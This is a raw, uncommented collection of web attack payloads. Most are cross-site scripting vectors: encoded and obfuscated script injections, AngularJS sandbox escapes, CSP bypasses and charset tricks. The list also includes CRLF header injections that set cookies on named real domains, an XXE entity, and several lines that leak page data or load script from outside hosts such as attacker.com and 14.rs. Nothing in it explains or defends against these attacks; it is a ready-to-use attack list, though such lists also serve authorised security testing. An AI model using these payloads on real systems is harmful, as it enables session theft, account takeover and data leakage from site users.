;%20alert%28%22XSS%22%29;%20var%20d=%27
%23%0dSet-Cookie:crlf=injection;domain=.sucuri.net;
'/ph-'*alert(1)*'%3E%3Cimg%20src=x%3E
"-alert(document.domain)-"
%22--%3e%3csvg/onload=alert(document.domain)%3e/%252e%252e
\'a\u{6c}e\u{72}t(1))%0a-->
%27);window[%27al\u0065rt%27](/XSS/);//
<button><select name=xss><option>%26%23x000000003c;script%26%23x000000003e;alert(1)%26%23x000000003c;/script%26%23x000000003e;
<button><select%20name=xss><option>%26%23x3c;script%26%23x3e;
\"};with(window)(onload=function){with(document){k=cookie};with(window){location='http://google.com?a=test'%2b;};}}//;
-alert(1)}//
” accesskey=x onclick=alert(1) 1=’
‘-alert(1)-‘<svg><!–
<svg><!–‘-alert(1)-‘
” href=javascript:alert(1) <math><!–
<math><!–” href=javascript:alert(1)//
<a href="slack://test?team=1&a=');eval(atob

('VFNTU0Iuc2VuZE1zZ0Zyb21Vc2VyKHdpbmRvdy5UUy5jaGFubmVscy5nZXRHZW5lcmFsQ2hhbm5lbCgpLmlkLCAiSGVsbG8sIEkgYW0gcHJvb2Ygb2YganMgaW5qZWN0aW9uIik7'));String

('">Click me for a good time</a>
1111'+alert('XSS')+' 
<object onerror=prompt()>
"><object onerror=prompt()>
<embed+allowscriptaccess=always+src=/xss.swf><base+href=//l0.cm/
XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
''onload='alert(1)'
Foobar" onmouseover=location&#x3d;'javascript:alert\x28document.domain\x29'
<!--\u{77}indow.top.eval('alert(document.domain)')
data:,\u0077indow.top.alert(1)
a=c.join([]);
t=o.anchor(true);//<a name="true">[object Undefined]</a
o=toString();//[object Object]
c=[];
{{'a'.constructor.prototype['char\u0041t']=''.concat;$eval("x='\"+(y='if(!window\\u002еx)alert(window\\u002ex=1)')+eval(y)+\"'");}}
'a'.constructor.prototype['char\u0041t']=''.concat;
'a'.constructor.prototype['char\u0041t']
"><img/src=1 onerror=eval((false+"")[1]+(false+"")[2]+(true+"")[3]+(true+"")[1]+(true+"")[0]+(false+[]["filter"])[20]+(undefined+"")[2]+(true+[]

["filter"])[10]+([]["filter"]+"")[3]+(undefined+"")[0]+(Number+"")[11]+(true+"")[3]+(undefined+"")[1]+(true+"")[0]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!

+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+([]["filter"]+"")[3]+(true+[]["filter"])[10]+(true+[]["filter"])[10]+(+(20))["toString"](21)+([false]+undefined)

[10]+(true+"")[3]+(true+[]["filter"])[20]) />
)')(iframe src=a)%20(iframe) )')(iframe src=a)%20(iframe)
"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
"><img src=x onerror=prompt(23);>
>"<<img src="c" onerror=alert(1)>
\"));throw_error()}catch(e){alert(1))}//
http%3A%2F%2Fvulnerabledoma.in&xdm_c=%22onload%3dalert(document.domain)//
'style='behavior:url(?)'onreadystatechange='alert(1)'
%27%73%74%79%6c%65%3d%27%62%65%68%61%76%69%6f%72%3a%75%72%6c%28%3f%29%27%6f%6e%72%65%61%64%79%73%74%61%74%65%63%68%61%6e%67%65%3d%27%61%6c

%65%72%74%28%31%29%27
&lt;img src=x onerror=alert(1) "
g%27,y=%27f%27,{[%27toStrin%27%2bx]:[].join,length:1,0:%27java\script:alert\x281\x29%27,[%27valueO%27%2by]:location}-%27
-{toString:%0d[].join,length:1,0:'javascript:alert(123)',valueOf:location}
-{toString:%0a[].join,length:1,0:'javascript:alert(123)',valueOf:location}
-{toString:%0a%0d[].join,length:1,0:'javascript:alert(123)',valueOf:location}
x='g',y='f',%0d%0a{['toStrin'+x]:[].join,length:1,0:'java\script:alert\x28123\x29',%0d%0a['valueO'+y]:location}-'';
x='g',y='f',%0a{['toStrin'+x]:[].join,length:1,0:'java\script:alert\x28123\x29',%0a['valueO'+y]:location}-'';
x='g',y='f',%0d{['toStrin'+x]:[].join,length:1,0:'java\script:alert\x28123\x29',%0d%['valueO'+y]:location}-'';
x='g',y='f',%0a{['toStrin'+x]:[].join,length:1,0:'java\script:alert\x28123\x29',%0d%['valueO'+y]:location}-'';
-{toString:[].join,length:1,0:'javascript:alert(123)',valueOf:location}
?1'-alert(1)-'"-alert(1)-"
1'-alert(1)-'"-alert(1)-"
wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&
?javascript:require('child_process').spawnSync('calc.exe')
impoty{i}from 'https:html5sec.org/module2'%0d%0ai```1`
impoty{i}from 'https:html5sec.org/module2' i```1`
import{i}from%20%27https%3Ahtml5sec.org%2fmodule2%27%0Ai%60%60%601%60
'onanimationcut=alert(location)+id=x+tabindex=0&css=*{animation-name:a}@keyframes+a{} #85
'onfocus<script>=location.href="//tinyurl.com/zr5n38y?%2526"%2bscripts[0].src.slice(42)%2b"%23x"+id=x+tabindex=1#x
"><script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script><div ng-app ng-csp id=p ng-click=$event.view.alert(1337)><script 

async src=//ajax.googleapis.com/jsapi?callback=p.click></script>
"ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script 

src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().alert(1337
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' 

allowscriptaccess=always>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
write`${top}`
write`${location}`
write`${top.name}`
write`${self.name}`
eval.call`${top.name}`
eval.call`${self.name}`
eval.call`${window.name}`
eval.call`${location.pathname}`
open.constructor`eval\x28name)```
[].map.call`eval\40name)${eval}`
[].map.call`eval\x28name)${eval}`
[].every.call`eval\x28name)${eval}`
eval.call`${'alert\40document.domain)'}`
document.write`${location.hash.slice`1`}`
vbs:eval+name
eval.call`${'alert\x28document.domain)'}`
a%22tabindex=9%20onfocus=%22alert(1)#a
%22onresize=%22alert(1)
%1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B
%3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E
{"id":"i9","method":"createDirectory","params":{"path":"/S3/vulnlab"},"jsonrpc":"2.0"}
https%3A//beacon.krxd.net/optout_check%3Fcallback%3Dalert%28/XSSED/.source%29
%3Cmeta%20charset=iso-2022-jp%3E%1B(B%1B%3E%3Csvg onload=alert(1)%3E%1B$B%1B
%3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a=
%3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B(
%20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{
function self::onload(){alert(1)}
' http-equiv='' onmo%2buseover='alert(1)&x=<meta name='description' content='This is about ' http-equiv=
'charset=ISO-2022-JP bla='<meta http-equiv=' $+B(+B$+B(+B script src=//html5sec.org/test.js $+B(+B$+B(+B/script $+B(+B
'charset=ISO-2022-JP$+B(+B$+B(+Bsvg/o+nload='alert(1)
;charset=cp1025'http-equiv='Content-Type' LÂĨ@֕Ɩä≕~m~`JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM

[N}}]JmmmmmmZZMm]nLɆفԅ@Ʉ~[n&<meta http-equiv=>
$.csrf('http://attack',{jackmasa:"xssucks~"});
$('.login').xform('http://evil') 
<:{v} onfocus=alert(":{v}") autofocus>
$.phishing('https://marquee-qa.gs.com','http://www.wp.pl')
javascript%3A%2F%2F"><script>alert(document.domain)</script>
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
%E5%98%8DSet-Cookie:%20test
%E5%98%8ASet-Cookie:%20test
%E5%98%8A%E5%98%8DSet-Cookie:%20test
javascript:"><link rel=prefetch href='//attacker.com/?
{}#f{font-family:'sans';}
';}
{}#f{font-family:'
"<sc"+"ript>alert(document.domain)</scr"+"ipt>"
test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test%3Ca%22'%0A</code>=%20+%20%3E;<font color='blue'>#test<a"'%0A<code>= +%20>;
test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E?test%3Ca%22%27%0A%60=%20+%20%3E;#test%3Ca%22%27%0A%60=%20+%20%3E; 
test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test</code>=%20+%20>;<font color='blue'>#test<a"'%0A<code>`=%20+%20>;
test</code>= +%20>;test<a"'%0A<code>`= +%20>?test</code>= +%20>;</font><font color='blue'>#test<a"'%0A<code>= +%20>;
window.name='a\x01b'
<font color='red'>test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E</font><font color='green'>?test%3Ca%22%27%0A%60=%20+%20%3E;</font>
<font color='red'>test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E</font><font color='green'>test<a"'%0A<code>`</code>=%20+%20>;</font>
test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?
<font color='red'>test%3Ca%22'%0A<code>=%20+%20%3E;test%3Ca%22'%0A`=%20+%20%3E?test%3Ca%22'%0A%60=%20+%20%3E; |
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
\u0061\u006c\u0065\u0072\u0074(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a;alert(1)
XSS%3Cmarquee%20onscroll=alert(1)%3E
‘;onerror=function()alert(1)%0Aa//<svg+onload=
%3C/script%3E%27//%3Csvg%20%22onload=alert%281%29//%3E#
</script><script>/*var a="/*""'/**/;alert(1);//</script>
</script "/*'/*><img/src=x */; onerror=alert(1) //
</script><script>/*"/*'/**/;alert(1)//</script>#
</script "/*'/*><svg */; onload=alert(1) //>
</script><img '//"%0Aonerror=alert(1)// src>
</script><img '//"%0Aonerror=alert(1)// src=1>
</script><svg onload='-/"/-[alert(1)]//'/>
</script><img src '//"%0Aonerror=alert(1)//
';//</script><svg ";%0Aonload=alert(1)// />#
</script "//'//><svg%0Aonload=alert(1)//>
</script>'//<svg "%0Aonload=alert(1)// />
</script>"//'//<svg%0Aonload=alert(1) //>
'//</script><svg "%0Aonload=alert(1)// />
</script>'//<svg "%0Aonload=alert(1) //>
'//</script><svg%20"%0aonload=alert(1)%20//>
</script>"//'//<svg%0Aonload=alert(1)//> (IE9)
'-/"/-alert(1)//'
p=\&q=-alert(1)//
{a: “-alert(1)}//\”, b: “-alert(1)}//\”};
-alert(1)}//\
p=-alert(1)}//\
p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
p=<svg/1=’&q=’onload=alert(1)>
*/</script>'>alert(1)/*<script/1='
*/</script>’>alert(1)/*<script/1=’
 p=*/</script>’>alert(1)/*<script/1=’
`-alert(1)>‘onload=”`<svg/1=’
`-alert(1)”>‘onload=”`<svg/1=’
'-alert(1)'>’onload='<svg/1='
p=`-alert(1)”>’onload=”`<svg/1=’
p=*/alert(1)”>’onload=”/*<svg/1=’
*/alert(1)</script><script>/*
’/alert(1)</script><script>/’
p=*/alert(1)</script><script>/*
p=’>alert(1)</script><script/1=’
p=’onload=alert(1)><svg/1=’
<--`<img/src=` onerror=alert(document.cookie)> --!> 
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');  }}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
</script%20><script%20>confirm(1)</script%20>
</script%0a><script%0a>confirm(1)</script%0a>
=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--
http://"onMouseMove="alert(0)
{{ methods | json }}
{{ systemu }}
{{ class }}
{{ to_yaml}}
/%0d%0aset-cookie%20%3amycookie%3dmyvalue;%20%44omain%20%3d.hackerone.com
%27%3Balert%28%27XSS%27%29%3B%27
<img src='test' onmouseover='alert(2)'>
\x3cimg src=\'test\' onmouseover=\'alert(2)\'\x3e]\
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
ng-include:'somefile?--&gt;&lt;svg&sol;onload=alert&lpar;1&rpar;&gt;
ng-include:'//ø.pw'
{{'<img src=x onerror=alert(1)>'}}
{{'javascript:alert(1)'}}
{{'javascript:'}}alert(1)
$event.target.ownerDocument.defaultView.alert(2)
<body ng-click="$event.view.alert(1)">Click me<h1 ng-mouseover="$event.target.ownerDocument.defaultView.alert(2)">Hover me</h1>
$event.view.alert(1)
constructor.constructor('alert(1)')()
{x:constructor.constructor('alert(1)')()};
&#x7b;&#x7b;constructor.constructor('alert(1)')()&#x7d;&#x7d;
{{alert(1)}}
{{}.toString.constructor('alert(1)')()}} 
{}.toString.constructor('alert(1)')
<!-- <!- - - -> -->comment<!-- <!- - - -> -->
"><meta http-equiv="refresh" content='0;url=/.\.\../.\.\../.\.\../google.com>
"><meta http-equiv="refresh" content='0;url=/////attacker.com/?>
"><meta http-equiv="refresh" content='0;url=http://attacker.com/?>
javascript:"><link rel=prefetch href='//attacker.com/?
%3Cscript/src=//14.rs+a="
%3Cscript/src=//14.rs+a=%22
%3Cscript+src=//14.rs+a=%22
<--`<img/src=` onerror=alert(document.domain)> --!>
%0A{}*{x:expression(alert(1))}
<p style="x=expression\0028alert(1)0029">
<p style="x=expression(alert(1))">
<p style="x=expression&#x28;alert(1))">
%25%32%35%25%33%33%25%36%33%25%36%39%25%36%64%25%36%37%25%32%35%25%33%32%25%36%32%25%37%33%25%37%32%25%36%33%25%32%35%25%33%33%25%36%34%25%37%38%25%32%35%2

5%33%32%25%36%32%25%36%66%25%36%65%25%36%35%25%37%32%25%37%32%25%36%66%25%37%32%25%32%35%25%33%33%25%36%34%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%

32%35%25%33%32%25%33%38%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%33%25%36%35%25%33%63%69%6d%67%25%32%62%73%72%63%25%33%64%78%25%32%62%6f%6e

%65%72%72%6f%72%25%33%64%61%6c%65%72%74%25%32%38%31%25%32%39%25%33%65%3cimg%2bsrc%3dx%2bonerror%3dalert%281%29%3e
<img+src=x+onerror=alert(1)>
"><img+src=x+onerror=alert(1)>
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div>
<div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//

["'`-->]]>]</div>
<div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div>
<div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//

["'`-->]]>]</div>
<div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div>
<div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div>
<div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div>
<div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div>
<div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div>
<div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div>
<div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div>
<div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div>
<div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div>
<div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div>
<div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div>
<div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div>
<div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div>
<div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div>
<div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div>
<div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div>
<div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div>
<div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div>
<div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div>
<div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` 

to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div>
<div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div>
<div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//

["'`-->]]>]</div>
<div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>
<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml 

values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div>
<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div>
<div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div>
<div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div>
<div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div>
<div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert

(2)">XXX</a>//["'`-->]]>]</div>
<div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% 

src=test.vml#xss></vmlframe>//["'`-->]]>]</div>
<div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) 

strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div>
<div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div>
<div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div>
<div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>
<div id="39"><!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(39)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  --

><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>
<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
<div id="41"><li style=list-style:url() onerror=alert(41)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)

></div>//["'`-->]]>]</div>
<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
<div id="43"><?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: 

url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>//["'`-->]]>]</div>
<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div>
<div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div>
<div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div>
<div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div>
<div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div>

<div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div>

<div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div>

<div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div>

<div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>

<div id="53"><xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>

<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div>

<div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div>

<div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div>

<div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div>

<div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div>

<div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = 

document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>

<div id="61"><div  style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div>

<div id="62"><!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(62)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? 

'="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div>

<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // 

IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>

<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" 

xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>

<div id="66"><?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' 

xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E

%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>//["'`-->]]>]</div>

<div id="67"><!DOCTYPE x [<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)" onload CDATA "alert(2)">]><img 

/>//["'`-->]]>]</div>

<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"><html:style /><x xlink:href="javascript:alert(68)" 

xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div>


<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//

["'`-->]]>]</div>

<div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div>

<div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div>

<div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div>

<div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div>

<div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div>

<div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div>

<div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div>

<div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div>

<div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div>

<div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div>

<div id="80"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//["'`-->]]>]</div>

<div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]

</div>

<div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>

<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml"  x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer 

value="1"/></x:template>//["'`-->]]>]</div>

<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div>

<div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div>

<div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>

<div id="87"><svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" 

height="1000" fill="white"/></a></svg>//["'`-->]]>]</div>

<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(88)"/><animation 

xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg 

xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(88)"/><foreignObject 

xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/></svg>//["'`-->]]>]</div>

<div id="89"><svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(89)"/><animate attributeName="onunload" to="alert

(89)"/></svg>//["'`-->]]>]</div>

<div id="90"><!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div 

style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div><div id="91">[A]<? foo="><script>alert(91)</script>"><! foo="><script>alert(91)

</script>"></ foo="><script>alert(91)</script>">[B]<? foo="><x foo='?><script>alert(91)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(91)

</script>">[D]<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>

<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>

